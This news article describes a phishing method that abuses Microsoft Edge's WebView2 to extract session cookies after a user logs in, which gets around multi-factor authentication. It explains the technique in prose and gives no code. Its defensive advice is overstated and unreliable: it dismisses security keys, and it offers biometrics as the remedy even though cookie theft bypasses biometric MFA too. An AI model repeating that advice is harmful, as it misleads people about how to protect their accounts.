A security researcher recently developed a new phishing technique using the Microsoft WebView app. This new technique has the potential to bypass MFA and steal login cookies and poses severe risks to the enterprise and individual users.
New phishing attack in Microsoft WebView to bypass MFA
Security researchers found a way for Microsoft Edge's WebView2 app to steal the target user's authentication cookies, enabling the attacker to bypass multi-factor authentication (MFA) to log into stolen accounts.
Amid database breaches, malware-based credential leakage, and phishing campaigns, stolen user credentials have become abundant online. Enterprise and individual users have started leveraging multi-factor authentication (MFA) to add a layer of security to the authentication process. However, with the advent of this technique, attackers can target one-time MFAs codes and security numbers.
Ethical Hacker, Mr.D0x is behind the release of this Microsoft WebView vulnerability. He also developed the Browser-in-the-Browser (BitB) attack method earlier this year.
How does a Microsoft WebView2 attack bypass MFA?
The researcher stated, "WebView2 also provides built-in functionality to extract cookies. It allows an attacker to extract cookies after the user authenticates into a legitimate website. This technique removes the need to spin up Evilginx2 or Modlishka, but the obvious trade-off is that the user must execute the binary and authenticate."
This cookie-stealing method can also import and extract cookies using a simple Chrome extension called the "EditThisCookie." The attack can also use the built-in WebView2 "ICoreWebView2CookieManager" interface to export the website's successfully authenticated cookies. However, the more concerning and alarming aspect is that this attack method can bypass multi-factor authentication (MFA) completely and takeover one-time passwords and security keys as it compromises the cookies after the user logs in.
The security awareness promoter at security awareness training company KnowBe4 Inc., Erich Kron, stated, "Other precautions must be taken to secure accounts and protect organizations against attack." He further explained that it might lead a victim to a dangerous activity and requires a single program (downloaded from the internet) to start the attack.
To avoid such threats, enterprises should stop using Microsoft Edge and apps leveraging Microsoft WebView2. Again, since one-time passcodes and security keys are no longer fit for MFA and additional security, users should use biometric authentication as 2FA.
Lastly, enterprises should leverage modern authentication measures like risk-based authentication (RBA) or adaptive authentication techniques that will not allow anyone else to enter the system from an unknown location.
As a prevention measure, enterprises should stop using apps that utilize Microsoft WebView2 and opt for biometric authentication methods as an additional security layer. Also, they should consider leveraging modern authentication measures like risk-based authentication or adaptive authentication to further tighten their security posture.